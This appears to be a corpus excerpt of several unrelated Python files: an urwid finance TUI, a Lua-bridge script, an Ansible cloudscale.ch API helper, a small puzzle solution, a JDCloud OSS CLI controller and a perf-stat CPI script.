    ('downbold', 'dark red,bold', ''),
]
# All style names declared above.
_STYLES = {palette_entry[0] for palette_entry in _PALETTE}
# Style -> bold-variant style, for styles that have one.
# NOTE(review): the `key in _STYLES` test is redundant — key iterates _STYLES.
_BOLD_MAP = {key: key + 'bold'
             for key in _STYLES if key in _STYLES and key + 'bold' in _STYLES}
class Controller:
    """View-stack controller: push() shows a new view, pop() returns to the previous one."""
    def __init__(self):
        self.stack = [_BACKGROUND]
        self.view = urwid.Padding(self.stack[-1], left=1, right=1)
    def push(self, w):
        """Display widget `w` on top of the current view."""
        self.stack.append(w)
        self._update()
    def pop(self):
        """Drop the top view and re-show (refreshing, when supported) the one below."""
        self.stack.pop()
        try:
            self.stack[-1].refresh()
        except AttributeError:
            pass  # the underlying view has no refresh() — nothing to do
        self._update()
    def unhandled_input(self, key):
        """Forward otherwise-unhandled key presses to the current top view."""
        try:
            self.stack[-1].unhandled_input(key)
        except AttributeError:
            pass  # the top view takes no key input
    def _update(self):
        # Show whatever is now on top of the stack.
        self.view.original_widget = self.stack[-1]
def make_button(title, callback_fn):
    """Create a clickable button wired to `callback_fn`, highlighted when focused."""
    btn = urwid.Button(title)
    urwid.connect_signal(btn, 'click', callback_fn)
    return urwid.AttrMap(btn, None, focus_map='reversed')
def boldify(w):
    # Re-map every style on `w` to its bold variant (see _BOLD_MAP).
    return urwid.AttrMap(w, attr_map=_BOLD_MAP)
def on_main(fn):
    """Wrap `fn` so it is scheduled on the urwid event loop instead of run inline."""
    def callback():
        # alarm(0, ...) runs the function on the next loop iteration.
        _main_event_loop.alarm(0, lambda: fn())
    return callback
class Header(urwid.WidgetWrap):
    """A row of underlined column titles, e.g. Header('Name', 'Value', aligns='lr')."""
    _ALIGNS = {'l': 'left', 'r': 'right'}
    def __init__(self, *titles, aligns=None):
        # Plain strings get the 'underline' style; (style, text) tuples pass through.
        styled = [title if isinstance(title, tuple) else ('underline', title)
                  for title in titles]
        if not aligns:
            aligns = 'l' * len(styled)
        alignments = [Header._ALIGNS[a] for a in aligns]
        if len(alignments) != len(styled):
            raise ValueError
        columns = urwid.Columns([urwid.Text(t, align=a)
                                 for t, a in zip(styled, alignments)])
        super().__init__(columns)
class SummaryView(urwid.WidgetWrap):
    """Top-level overview: account balances then share holdings, with totals."""
    def __init__(self, dc: data_controller.DataController, controller: Controller):
        self.dc = dc
        self.controller = controller
        self.focus_walker = None
        # Remembered focus index so a refresh does not jump the cursor.
        self._last_focus = None
        # Re-render on every ticker update; on_main defers the call to the UI loop.
        symbol_values.Ticker.register_callback(
            'SummaryView',
            on_main(self.refresh))
        # lambda: controller.main_loop.event_loop.alarm(0, lambda *_: self.refresh()))
        with self.dc.connect():
            super(SummaryView, self).__init__(self._get_menu())
    def unhandled_input(self, key):
        # 'r' forces a manual refresh.
        if key == 'r':
            self.refresh()
    def refresh(self):
        """Rebuild the whole menu from current data."""
        logger.info('***\nREFRESH\n***')
        with self.dc.connect():
            self._set_w(self._get_menu())
    def __del__(self):
        # Stop receiving ticker callbacks once the view is garbage-collected.
        symbol_values.Ticker.remove_callback('SummaryView')
    def _get_menu(self):
        """Build the full ListBox: accounts section, then shares section."""
        body = [urwid.Text(('brand', 'ppfin')), urwid.Divider()]
        # Normal (category-0) Accounts
        accs = self.dc.get_all_accounts(category=0)
        body += [Header('Account', 'Diff', 'Balance', aligns='lrr')]
        for acc in accs:
            # `btn` is a parameter of the lambda, so there is no late-binding issue.
            body.append(urwid.Columns([
                make_button(acc.name, lambda btn: self._show_account(btn.get_label())),
                urwid.Text(acc.get_diff_to_last().attr_str(), align='right'),
                urwid.Text(str(acc.get_balance()), align='right')]))
        # Totals over category-0 accounts only; the diff total is rendered here.
        total_diff = sum(acc.get_diff_to_last() for acc in accs).attr_str()
        total = sum(acc.get_balance() for acc in accs)
        # Special (category-1) Accounts — shown without a diff column.
        accs = self.dc.get_all_accounts(category=1)
        if accs:
            for acc in accs:
                body.append(urwid.Columns([
                    make_button(acc.name, lambda btn: self._show_account(btn.get_label())),
                    urwid.Text(''),
                    urwid.Text(str(acc.get_balance()), align='right')]))
                total += acc.get_balance()
        body += [urwid.Columns([
            urwid.Text(('bold', 'Total')),
            boldify(urwid.Text(total_diff, align='right')),
            urwid.Text(('bold', str(total)), align='right')])]
        body += [urwid.Divider(),
                 make_button('Update Balances', self._update_balances),
                 make_button('Add Account', self._add_account),
                 urwid.Divider()]
        # Shares
        symbol_overviews = self.dc.get_all_symbol_overviews()
        if not symbol_overviews:
            body += [urwid.Text('No Shares!')]
        else:
            body += [Header('Symbol', 'Shares', 'Gain', 'Possession', aligns='lrrr')]
            for so in symbol_overviews:
                body.append(urwid.Columns([
                    make_button(so.symbol, self._update_share),
                    urwid.Text(str(so.quantity), align='right'),
                    urwid.Text(so.get_current_total_gain().attr_str(),
                               align='right'),
                    urwid.Text(str(so.get_current_total_value()),
                               align='right')]))
            # Totals converted into the base currency.
            total_gain = sum(
                so.get_current_total_gain(currency=_BASE_CURRENCY)
                for so in symbol_overviews)
            total_share_value = sum(
                so.get_current_total_value(currency=_BASE_CURRENCY)
                for so in symbol_overviews)
            body += [
                urwid.Columns([
                    urwid.Text(('bold', 'Total')),
                    urwid.Text(''),
                    urwid.Text(('bold', str(total_gain)), align='right'),
                    urwid.Text(('bold', str(total_share_value)), align='right'),
                ])
            ]
        body += [urwid.Divider(),
                 make_button('Update Shares', self._update_shares),
                 make_button('Add Share', self._add_share),
                 urwid.Divider()]
        self.focus_walker = urwid.SimpleFocusListWalker(body)
        # Track focus changes so the next rebuild can restore the position.
        urwid.connect_signal(self.focus_walker, 'modified',
                             lambda: self._cache_focus_value())
        if self._last_focus is not None:
            self.focus_walker.set_focus(self._last_focus)
        return urwid.ListBox(self.focus_walker)
    def _show_account(self, account_name):
        """Push a detail view for the given account name."""
        self.controller.push(AccountDetailView(
            self.dc, self.controller, account_name))
    def _cache_focus_value(self):
        # Called on every walker 'modified' signal; keeps focus across refreshes.
        self._last_focus = self.focus_walker.focus
    def _update_share(self, k):
        # NOTE(review): looks like a debug placeholder — raising just surfaces
        # the clicked label; confirm the intended behaviour.
        raise ValueError(k.get_label())
    def _update_shares(self, _):
        # Not implemented yet.
        pass
    def _add_share(self, _):
        """Push a small form asking for symbol and currency of a new share."""
        def done(_):
            name = name_edit.get_edit_text()
            currency = cur_edit.get_edit_text()
            try:
                self.dc.add_stock_symbol(name, currency)
            except data_controller.SymbolExistsException:
                pass # TODO: maybe handle
            self.controller.pop()
        header = urwid.Text('Add Share')
        name_edit = urwid.Edit("Symbol: ")
        cur_edit = urwid.Edit("Currency: ")
        widget = urwid.Pile([
            header,
            name_edit,
            cur_edit,
            make_button('Done', done),
            make_button('Cancel', lambda _: self.controller.pop()),
        ])
        self.controller.push(urwid.Filler(widget, 'top'))
    def _update_balances(self, _):
        """Push the balance-update form."""
        self.controller.push(UpdateView(self.dc, self.controller))
    def _add_account(self, _):
        """Push a small form asking for the name of a new account."""
        def done(_):
            name, _ = name_edit.get_text()
            # get_text() returns caption+text, so strip the caption prefix.
            name = name.replace('Name: ', '')
            self.dc.create_account(name, _BASE_CURRENCY) # TODO
            self.controller.pop()
        name_edit = urwid.Edit("Name: ")
        header = urwid.Text('Add Account')
        widget = urwid.Pile([
            header,
            name_edit,
            make_button('Done', done),
            make_button('Cancel', lambda _: self.controller.pop()),
        ])
        self.controller.push(urwid.Filler(widget, 'top'))
class AccountDetailView(urwid.WidgetWrap):
    """Read-only list of all transactions for one account."""
    def __init__(self,
                 dc: data_controller.DataController,
                 controller: Controller,
                 account_name: str):
        self.dc = dc
        self.controller = controller
        self.account_name = account_name
        super().__init__(self._get())
    def _get(self):
        """Build the transaction list widget (date / info / amount rows)."""
        rows = [Header('Date', 'Info', 'Amount', aligns='llr')]
        for txn in self.dc.get_account_transactions(self.account_name):
            rows.append(urwid.Columns([
                urwid.Text(txn.date),
                urwid.Text(txn.info),
                urwid.Text(txn.value.attr_str(), align='right'),
            ]))
        rows.append(urwid.Divider())
        rows.append(make_button('Done', lambda _: self.controller.pop()))
        return urwid.ListBox(urwid.SimpleFocusListWalker(rows))
class UpdateView(urwid.WidgetWrap):
    """Form with one edit field per category-0 account to enter new balances.

    On Done, every non-empty field is validated as a float and the difference
    to the current balance is recorded as a transaction.
    """
    def __init__(self,
                 dc: data_controller.DataController,
                 controller: Controller):
        self.dc = dc
        self.controller = controller
        self.done_button: urwid.AttrMap = None
        self.focus_walker: urwid.SimpleFocusListWalker = None
        self.accs = None
        super(UpdateView, self).__init__(self._get_menu())
    def refresh(self):
        """Rebuild the form from the current account list."""
        self._set_w(self._get_menu())
    def unhandled_input(self, key):
        # Enter jumps to the next field (skipping dividers), like Tab in a form.
        if key == 'enter':
            # is_ok = self._validate()
            current_idx = self.focus_walker.focus
            next_position = self.focus_walker.next_position(current_idx)
            if isinstance(self.focus_walker[next_position], urwid.Divider):
                next_position += 1
            self.focus_walker.set_focus(next_position)
    def _get_menu(self):
        """Build the edit form: one Edit per account plus Done/Cancel buttons."""
        body = [urwid.Text('Update'), urwid.Divider()]
        self.accs = self.dc.get_all_accounts(category=0)
        if not self.accs:
            # Fixed: the original `raise NotImplemented` raised a TypeError at
            # runtime (NotImplemented is a value, not an exception class).
            raise NotImplementedError('no accounts to update')
        # Pad captions so the edit cursors line up in one column.
        indent = max(len(acc.name) for acc in self.accs) + 5
        for acc in self.accs:
            label = acc.name + ':'
            indent_acc = (indent - len(label)) * ' '
            body.append(urwid.Edit(f"{label}{indent_acc}"))
        def done(_):
            all_ok = self._validate()
            if all_ok:
                self._commit()
                self.controller.pop()
        self.done_button = make_button('Done', done)
        body += [urwid.Divider(),
                 self.done_button,
                 make_button('Cancel', lambda _: self.controller.pop()),
                 ]
        self.focus_walker = urwid.SimpleFocusListWalker(body)
        # Re-validate on every edit so errors show up immediately.
        urwid.connect_signal(self.focus_walker, 'modified',
                             lambda: self._validate())
        return urwid.ListBox(self.focus_walker)
    def _commit(self):
        """Record one transaction per filled-in field (new balance - old balance)."""
        edit_fields = [e for e in self.focus_walker
                       if isinstance(e, urwid.Edit)]
        assert len(edit_fields) == len(self.accs)
        with self.dc.connect():
            for e, acc in zip(edit_fields, self.accs):
                assert acc.name in e.caption
                value = e.get_edit_text()
                if not value:
                    continue  # empty field: leave the account untouched
                value = float(value)
                diff = value - acc.get_balance()
                self.dc.add_transaction(acc.name, diff)
    def _validate(self):
        """Mark non-float fields (':' -> '!' in the caption, error style).

        Returns True when every non-empty field parses as a float; also keeps
        the Done button's label and style in sync with the validation state.
        """
        all_ok = True
        for e in self.focus_walker:
            if not isinstance(e, urwid.Edit):
                continue
            value = e.get_edit_text()
            if not value:
                continue  # empty fields are always acceptable
            try:
                float(value)
                is_ok = True
            except ValueError:
                is_ok = False
            caption = e.caption
            if is_ok and '!' in caption:
                caption = caption.replace('!', ':')
                e.set_caption(caption)
            if not is_ok and '!' not in caption:
                caption = caption.replace(':', '!')
                e.set_caption(('err', caption))
            all_ok = all_ok and is_ok
        if not all_ok:
            self.done_button.set_attr_map({None: 'err'})
            self.done_button.original_widget.set_label(
                'Errors: All values must be floats!')
        else:
            self.done_button.set_attr_map({None: None})
            self.done_button.original_widget.set_label(
                'Done')
        return all_ok
class MainWindow:
    """Owns the data controller, the root view Controller, and the urwid main loop."""
    def __init__(self, dc: data_controller.DataController):
        self.dc = dc
        self.controller = Controller()
        self.controller.push(SummaryView(dc, self.controller))
        self.main_loop = None
    def make_main_loop(self):
        """Create (and remember) the urwid MainLoop bound to our view tree."""
        self.main_loop = urwid.MainLoop(
            self.draw(),
            palette=_PALETTE,
            unhandled_input=self.controller.unhandled_input,
            event_loop=_main_event_loop)
        return self.main_loop
    def draw(self):
        """Overlay the controller's view on the shaded background (80% of the screen)."""
        return urwid.Overlay(
            self.controller.view, _BACKGROUND,
            align='center', width=('relative', 80),
            valign='middle', height=('relative', 80),
            min_width=20, min_height=9)
def item_chosen(button, choice):
    """Exit the main loop when an item is chosen.

    NOTE(review): the statements that followed the raise in the original were
    unreachable leftovers from a urwid tutorial (they referenced a `main`
    widget that does not exist here); they have been removed. Behaviour is
    unchanged — the function always raised before reaching them.
    """
    raise urwid.ExitMainLoop()
def exit_program(button):
    # Button callback: quit the urwid main loop.
    raise urwid.ExitMainLoop()
def main():
    """Parse --database, build the UI, and run the event loop."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--database', '-db', required=True)
    flags = parser.parse_args()
    window = MainWindow(data_controller.DataController(flags.database))
    window.make_main_loop().run()
if __name__ == '__main__':
    main()
| 13,244 | 4,480 |
import lupa
from lupa import LuaRuntime
lua = LuaRuntime(unpack_returned_tuples=True)
fileName = "test_json/3.json"
repo_name = "aaa"
meta_version = "bbbb"
# Build a small Lua prelude that defines the three globals used by the Lua scripts.
comd = ""
comd += "fileName = " + "'" + fileName + "'\n"
comd += "repo_name = " + "'" + repo_name + "'\n"
comd += "meta_version = " + "'" + meta_version + "'\n"
# print() calls replace the Python-2 print statements: identical output and
# the file now also runs under Python 3.
print(comd)
#lua.eval("dostring("+comd+")")
# `with` guarantees the file is closed even if write() fails.
with open("jsonForPY.lua", "w+") as fo:
    fo.write(comd)
lua.eval("dofile('jsonForPY.lua')")
a = lua.eval("dofile('jsonCompletion.lua')")
print(a['appname'])
print(a['procs']['bar']['port']['port'])
| 563 | 242 |
# -*- coding: utf-8 -*-
#
# (c) 2017, Gaudenz Steinlin <gaudenz.steinlin@cloudscale.ch>
# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from copy import deepcopy
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_text
API_URL = 'https://api.cloudscale.ch/v1/'
def cloudscale_argument_spec():
    """Return the module argument-spec entries shared by all cloudscale.ch modules."""
    spec = dict(
        api_token=dict(
            fallback=(env_fallback, ['CLOUDSCALE_API_TOKEN']),
            no_log=True,
            required=True,
            type='str',
        ),
        api_timeout=dict(default=30, type='int'),
    )
    return spec
class AnsibleCloudscaleBase(object):
    """Shared base for cloudscale.ch Ansible modules: authenticated REST calls
    plus changed/diff result bookkeeping."""
    def __init__(self, module):
        self._module = module
        self._auth_header = {'Authorization': 'Bearer %s' % module.params['api_token']}
        # Result skeleton every module returns; _param_updated() fills the diff.
        self._result = {
            'changed': False,
            'diff': dict(before=dict(), after=dict()),
        }
    def _get(self, api_call):
        """GET `api_call`; return decoded JSON, None on 404, fail_json otherwise."""
        resp, info = fetch_url(self._module, API_URL + api_call,
                               headers=self._auth_header,
                               timeout=self._module.params['api_timeout'])
        if info['status'] == 200:
            return self._module.from_json(to_text(resp.read(), errors='surrogate_or_strict'))
        elif info['status'] == 404:
            return None
        else:
            self._module.fail_json(msg='Failure while calling the cloudscale.ch API with GET for '
                                   '"%s".' % api_call, fetch_url_info=info)
    def _post_or_patch(self, api_call, method, data):
        """Send `data` as JSON via POST or PATCH; return decoded body (None on 204)."""
        # This helps with tags when we have the full API resource href to update.
        if API_URL not in api_call:
            api_endpoint = API_URL + api_call
        else:
            api_endpoint = api_call
        headers = self._auth_header.copy()
        if data is not None:
            # Sanitize data dictionary
            # Deepcopy: Duplicate the data object for iteration, because
            # iterating an object and changing it at the same time is insecure
            # NOTE(review): this mutates the caller's `data` dict (drops None
            # values) — confirm callers do not rely on those keys afterwards.
            for k, v in deepcopy(data).items():
                if v is None:
                    del data[k]
            data = self._module.jsonify(data)
            headers['Content-type'] = 'application/json'
        resp, info = fetch_url(self._module,
                               api_endpoint,
                               headers=headers,
                               method=method,
                               data=data,
                               timeout=self._module.params['api_timeout'])
        if info['status'] in (200, 201):
            return self._module.from_json(to_text(resp.read(), errors='surrogate_or_strict'))
        elif info['status'] == 204:
            return None
        else:
            self._module.fail_json(msg='Failure while calling the cloudscale.ch API with %s for '
                                   '"%s".' % (method, api_call), fetch_url_info=info)
    def _post(self, api_call, data=None):
        """POST helper; see _post_or_patch."""
        return self._post_or_patch(api_call, 'POST', data)
    def _patch(self, api_call, data=None):
        """PATCH helper; see _post_or_patch."""
        return self._post_or_patch(api_call, 'PATCH', data)
    def _delete(self, api_call):
        """DELETE `api_call`; return None on 204, fail_json otherwise."""
        resp, info = fetch_url(self._module,
                               API_URL + api_call,
                               headers=self._auth_header,
                               method='DELETE',
                               timeout=self._module.params['api_timeout'])
        if info['status'] == 204:
            return None
        else:
            self._module.fail_json(msg='Failure while calling the cloudscale.ch API with DELETE for '
                                   '"%s".' % api_call, fetch_url_info=info)
    def _param_updated(self, key, resource):
        """PATCH `key` on `resource` when the module param differs from the API value.

        Records before/after in the diff, honours check mode, and returns True
        when an update was (or would be) made.
        """
        param = self._module.params.get(key)
        if param is None:
            return False
        if resource and key in resource:
            if param != resource[key]:
                self._result['changed'] = True
                patch_data = {
                    key: param
                }
                self._result['diff']['before'].update({key: resource[key]})
                self._result['diff']['after'].update(patch_data)
                if not self._module.check_mode:
                    href = resource.get('href')
                    if not href:
                        self._module.fail_json(msg='Unable to update %s, no href found.' % key)
                    self._patch(href, patch_data)
                return True
        return False
    def get_result(self, resource):
        """Merge all fields of `resource` into the module result and return it."""
        if resource:
            for k, v in resource.items():
                self._result[k] = v
        return self._result
| 4,917 | 1,370 |
S = input()
# Strip the recognized words; longer variants first so "dreamer"/"eraser"
# cannot be mis-consumed as "dream"+"er" / "erase"+"r".
for word in ("eraser", "erase", "dreamer", "dream"):
    S = S.replace(word, "")
# The string is valid exactly when nothing remains.
print("YES" if S == "" else "NO")
| 160 | 64 |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from argparse import RawTextHelpFormatter
from jdcloud_cli.cement.ext.ext_argparse import expose
from jdcloud_cli.controllers.base_controller import BaseController
from jdcloud_cli.client_factory import ClientFactory
from jdcloud_cli.parameter_builder import collect_user_args, collect_user_headers
from jdcloud_cli.printer import Printer
from jdcloud_cli.skeleton import Skeleton
class OssopenapiController(BaseController):
class Meta:
label = 'ossopenapi'
help = 'oss openapi'
description = '''
ossopenapi cli 子命令,oss openapi。
OpenAPI文档地址为:https://docs.jdcloud.com/cn/xxx/api/overview
'''
stacked_on = 'base'
stacked_type = 'nested'
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) 查询用量的指定bucket """, dest='bucketName', required=True)),
(['--capacity-types'], dict(help="""(array: int) <p>查询用量数据类型:</p><br><code>1000040</code>:标准存储<br><code>1000041</code>:低冗余存储<br><code>1000042</code>:归档存储<br><code>1000043</code>归档overHead存储:<br><code>1000044</code>低频存储:<br><code>1000045</code>低频overHead存储:<br><code>1</code>:内网GET流量<br><code>2</code>:内网HEAD流量<br><code>3</code>:内网PUT流量<br><code>4</code>:内网POST流量<br><code>5</code>:内网DELETE流量<br><code>6</code>:内网OPTIONS流量<br><code>7</code>:内网TRACE流量<br><code>11</code>:外网GET流量<br><code>12</code>:外网HEAD流量<br><code>13</code>:外网PUT流量<br><code>14</code>:外网POST流量<br><code>15</code>:外网DELETE流量<br><code>16</code>:外网OPTIONS流量<br><code>17</code>:外网TRACE流量<br><code>21</code>:CDN GET流量<br><code>22</code>:CDN HEAD流量<br><code>23</code>:CDN PUT流量<br><code>24</code>:CDN POST流量<br><code>25</code>:CDN DELETE流量<br><code>26</code>:CDN OPTIONS流量<br><code>27</code>:CDN TRACE流量<br><code>31</code>:内网GET数<br><code>32</code>:内网HEAD数<br><code>33</code>:内网PUT数<br><code>34</code>:内网POST数<br><code>35</code>:内网DELETE数<br><code>36</code>:内网OPTIONS数<br><code>37</code>:内网TRACE数<br><code>51</code>:外网GET数<br><code>52</code>:外网HEAD数<br><code>53</code>:外网PUT数<br><code>54</code>:外网POST数<br><code>55</code>:外网DELETE数<br><code>56</code>:外网OPTIONS数<br><code>57</code>:外网TRACE数<br><code>61</code>:CDN GET数<br><code>62</code>:CDN HEAD数<br><code>63</code>:CDN PUT数<br><code>64</code>:CDN POST数<br><code>65</code>:CDN DELETE数<br><code>66</code>:CDN OPTIONS数<br><code>67</code>:CDN TRACE数<br><code>71</code>:归档提前删除<br><code>72</code>:低频提前删除<br><code>81</code>:归档取回Bulk<br><code>82</code>:归档取回Std<br><code>83</code>:归档取回Exp<br><code>84</code>:低频数据取回; """, dest='capacityTypes', type=int, required=True)),
(['--begin-time'], dict(help="""(string) 开始时间,使用UTC时间,格式为:YYYY-MM-DDTHH:mm:ss'Z' """, dest='beginTime', required=False)),
(['--end-time'], dict(help="""(string) 结束时间,使用UTC时间,格式为:YYYY-MM-DDTHH:mm:ss'Z' """, dest='endTime', required=False)),
(['--period-type'], dict(help="""(int) 查询数据的聚合方式:<br><code>0</code>:all, 最大查询区间365天 <br><code>1</code>:hour,最大查询区间31天。默认1<br><code>2</code>:day, 最大查询区间365天。 """, dest='periodType', type=int, required=False)),
(['--method'], dict(help="""(int) 返回数据的方式: <code>1</code>:recent(区间值), <code>2</code>:current(当前值。method = 2 时如果查询当前值时传入beginTime,则按照beginTime时间来进行查询;如果不传beginTime,则按照后端系统时间查询。) """, dest='method', type=int, required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 根据type获取指定bucket用量数据 ''',
description='''
根据type获取指定bucket用量数据。
示例: jdc ossopenapi get-single-bucket-capacity --bucket-name xxx --capacity-types [0] --method 0
''',
)
    def get_single_bucket_capacity(self):
        """CLI handler: query capacity/usage metrics for one OSS bucket."""
        client_factory = ClientFactory('ossopenapi')
        client = client_factory.get(self.app)
        if client is None:
            return
        try:
            # Imported lazily: older SDK versions may not ship this API.
            from jdcloud_sdk.services.ossopenapi.apis.GetSingleBucketCapacityRequest import GetSingleBucketCapacityRequest
            params_dict = collect_user_args(self.app)
            headers = collect_user_headers(self.app)
            req = GetSingleBucketCapacityRequest(params_dict, headers)
            resp = client.send(req)
            Printer.print_result(resp)
        except ImportError:
            print('{"error":"This api is not supported, please use the newer version"}')
        except Exception as e:
            print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 获取回源配置 ''',
description='''
获取回源配置。
示例: jdc ossopenapi get-back-source-configuration --bucket-name xxx
''',
)
    def get_back_source_configuration(self):
        """CLI handler: fetch the back-to-source configuration of a bucket."""
        client_factory = ClientFactory('ossopenapi')
        client = client_factory.get(self.app)
        if client is None:
            return
        try:
            # Imported lazily: older SDK versions may not ship this API.
            from jdcloud_sdk.services.ossopenapi.apis.GetBackSourceConfigurationRequest import GetBackSourceConfigurationRequest
            params_dict = collect_user_args(self.app)
            headers = collect_user_headers(self.app)
            req = GetBackSourceConfigurationRequest(params_dict, headers)
            resp = client.send(req)
            Printer.print_result(resp)
        except ImportError:
            print('{"error":"This api is not supported, please use the newer version"}')
        except Exception as e:
            print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--back-source-rules'], dict(help="""(array: backSourceRule) 回源配置规则 """, dest='backSourceRules', required=False)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 添加修改回源配置 ''',
description='''
添加修改回源配置。
示例: jdc ossopenapi put-back-source-configuration --bucket-name xxx
''',
)
def put_back_source_configuration(self):
    """Create or update the back-to-source configuration of a bucket."""
    factory = ClientFactory('ossopenapi')
    client = factory.get(self.app)
    if client is None:
        return
    try:
        # Imported lazily: an older SDK without this API is reported below.
        from jdcloud_sdk.services.ossopenapi.apis.PutBackSourceConfigurationRequest import PutBackSourceConfigurationRequest
        request = PutBackSourceConfigurationRequest(collect_user_args(self.app),
                                                    collect_user_headers(self.app))
        Printer.print_result(client.send(request))
    except ImportError:
        print('{"error":"This api is not supported, please use the newer version"}')
    except Exception as e:
        print(e)
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) Bucket名称 """, dest='bucketName', required=True)),
(['--input-json'], dict(help='(json) 以json字符串或文件绝对路径形式作为输入参数。\n字符串方式举例:--input-json \'{"field":"value"}\';\n文件格式举例:--input-json file:///xxxx.json', dest='input_json', required=False)),
(['--headers'], dict(help="""(json) 用户自定义Header,举例:'{"x-jdcloud-security-token":"abc","test":"123"}'""", dest='headers', required=False)),
],
formatter_class=RawTextHelpFormatter,
help=''' 删除回源配置 ''',
description='''
删除回源配置。
示例: jdc ossopenapi delete-back-source-configuration --bucket-name xxx
''',
)
def delete_back_source_configuration(self):
    """Remove the back-to-source configuration of a bucket."""
    factory = ClientFactory('ossopenapi')
    client = factory.get(self.app)
    if client is None:
        return
    try:
        # Imported lazily: an older SDK without this API is reported below.
        from jdcloud_sdk.services.ossopenapi.apis.DeleteBackSourceConfigurationRequest import DeleteBackSourceConfigurationRequest
        request = DeleteBackSourceConfigurationRequest(collect_user_args(self.app),
                                                       collect_user_headers(self.app))
        Printer.print_result(client.send(request))
    except ImportError:
        print('{"error":"This api is not supported, please use the newer version"}')
    except Exception as e:
        print(e)
@expose(
    arguments=[
        (['--api'], dict(help="""(string) api name """, choices=['get-single-bucket-capacity','get-back-source-configuration','put-back-source-configuration','delete-back-source-configuration',], required=True)),
    ],
    formatter_class=RawTextHelpFormatter,
    help=''' 生成单个API接口的json骨架空字符串 ''',
    description='''
        生成单个API接口的json骨架空字符串。
        示例: jdc ossopenapi generate-skeleton --api get-back-source-configuration ''',
)
def generate_skeleton(self):
    """Print an empty JSON input skeleton for the chosen ossopenapi API.

    Note: the usage example previously read "jdc nc generate-skeleton --api
    describeContainer" — a copy/paste from another service whose api name is
    not among this command's choices; it now shows a valid invocation.
    """
    skeleton = Skeleton('ossopenapi', self.app.pargs.api)
    skeleton.show()
| 10,879 | 4,045 |
# SPDX-License-Identifier: GPL-2.0
from __future__ import print_function
# Counter samples keyed by "<time>-<event>-<cpu>-<thread>" -> [val, ena, run].
data = {}
# First-seen orderings, iterated by stat__interval() below.
times = []
threads = []
cpus = []
def get_key(time, event, cpu, thread):
    """Build the composite dict key that identifies one counter sample."""
    return "%d-%s-%d-%d" % (time, event, cpu, thread)
def store_key(time, cpu, thread):
    """Remember each time/cpu/thread the first time it is seen, in order."""
    for seen, value in ((times, time), (cpus, cpu), (threads, thread)):
        if value not in seen:
            seen.append(value)
def store(time, event, cpu, thread, val, ena, run):
    """Save one counter sample, indexed by (time, event, cpu, thread)."""
    store_key(time, cpu, thread)
    data[get_key(time, event, cpu, thread)] = [val, ena, run]
def get(time, event, cpu, thread):
    """Return the stored counter value (val) for the given sample key."""
    return data[get_key(time, event, cpu, thread)][0]
# perf-stat callbacks: perf calls stat__<event>[_<modifier>]() per sample.
# Kernel-only (_k), user-only (_u) and combined variants all record under
# the same event name.  (Stray C-style trailing semicolons removed.)
def stat__cycles_k(cpu, thread, time, val, ena, run):
    store(time, "cycles", cpu, thread, val, ena, run)

def stat__instructions_k(cpu, thread, time, val, ena, run):
    store(time, "instructions", cpu, thread, val, ena, run)

def stat__cycles_u(cpu, thread, time, val, ena, run):
    store(time, "cycles", cpu, thread, val, ena, run)

def stat__instructions_u(cpu, thread, time, val, ena, run):
    store(time, "instructions", cpu, thread, val, ena, run)

def stat__cycles(cpu, thread, time, val, ena, run):
    store(time, "cycles", cpu, thread, val, ena, run)

def stat__instructions(cpu, thread, time, val, ena, run):
    store(time, "instructions", cpu, thread, val, ena, run)
def stat__interval(time):
    """perf callback: at the end of each interval print CPI per cpu/thread."""
    for cpu in cpus:
        for thread in threads:
            cycles = get(time, "cycles", cpu, thread)
            instructions = get(time, "instructions", cpu, thread)
            # Guard against a zero instruction count.
            cpi = cycles / float(instructions) if instructions != 0 else 0
            print("%15f: cpu %d, thread %d -> cpi %f (%d/%d)" %
                  (time / (float(1000000000)), cpu, thread, cpi, cycles, instructions))
def trace_end():
    """perf hook invoked once tracing finishes; nothing to do here."""
    pass
# XXX trace_end callback could be used as an alternative place
# to compute same values as in the script above:
#
# for time in times:
# for cpu in cpus:
# for thread in threads:
# cyc = get(time, "cycles", cpu, thread)
# ins = get(time, "instructions", cpu, thread)
#
